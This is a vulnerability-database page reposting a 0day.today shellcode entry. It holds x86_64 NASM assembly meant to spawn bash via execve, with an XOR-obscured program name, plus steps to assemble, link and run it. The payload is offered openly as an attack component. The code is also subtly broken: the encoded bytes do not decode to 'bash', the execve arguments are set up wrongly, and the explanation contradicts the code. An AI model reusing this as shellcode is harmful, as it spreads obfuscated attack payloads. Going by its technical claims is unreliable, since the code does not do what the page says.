Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Linux/x86_64 - bash Shellcode with xor encoding Shellcode (71 bytes)

🗓️ 05 Apr 2023 00:00:00Reported by Jeenika AnadaniType 
zdt
 zdt🔗 0day.today👁 223 Views

Linux/x86_64 - bash Shellcode with xor encoding. Uses XOR encryption to hide the program name "bash". Executes the program using execve() and exits with status code 0

Code
Exploit Title: Linux/x86_64 - bash shellcode with xor encoding
Date: 05/02/2023
Exploit Author: Jeenika Anadani
Contact: https://twitter.com/cyber_jeeni
Category: Shellcode
Architectue: Linux x86_64
Shellcode Length: 71 Bytes

-----------------------
section .data

section .text
  global _start

_start:
  ; set up argv and envp arrays for execve()
  xor rax, rax
  mov [rsp-8], rax
  mov qword [rsp-16], 0x72613162 ; encrypted 'bash'
  xor byte [rsp-16], 0x08
  xor byte [rsp-15], 0x16
  xor byte [rsp-14], 0x24
  xor byte [rsp-13], 0x32
  lea rdx, [rsp-16]
  mov qword [rsp-24], rdx
  mov qword [rsp-32], rdx
  lea rdi, [rsp-32]

  ; call execve()
  xor eax, eax
  mov al, 59
  syscall

  ; exit with status code 0
  xor eax, eax
  mov ebx, eax
  mov al, 60
  syscall

-----------
#### Explanation:

This code uses XOR encryption to obscure the name of the program being executed, `"bash"`. The XOR encryption key is `0x08162432`, which is applied to each byte of the string. The decryption is performed just before calling `execve`, so the program name is passed in its original form.

The rest of the code is the same as the previous example, making a system call to the `execve` function and then calling the `exit` syscall to terminate the process.

---------
### Compilation AND Execution:

To run the x86_64 assembly code on a Linux system, you need to assemble it into an executable file and then run the file. Here are the steps:

1.  Save the code to a file with a `.asm` extension, for example `bash.asm`.
   
2.  Assemble the code into an object file using an assembler, such as NASM:
	`nasm -f elf64 -o bash.o bash.asm`
The `-f elf64` option specifies that the output format should be ELF64 (Executable and Linkable Format), and the `-o` option specifies the name of the output file, `bash.o`.
    
3.  Link the object file to produce an executable file using the `ld` linker:
	`ld -s -o bash bash.o`
The `-s` option removes the symbol table from the output file to make it smaller, and the `-o` option specifies the name of the output file, `bash`.
    
4. Make the file executable:
	`chmod +x bash`

5. Finally, you can run the file:
	`./bash`

---------------------

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
05 Apr 2023 00:00Current
7.4High risk
Vulners AI Score7.4
linux x86_64xor encryptionexecveexit syscallnasmelf64linkerexecutable filesystem call
223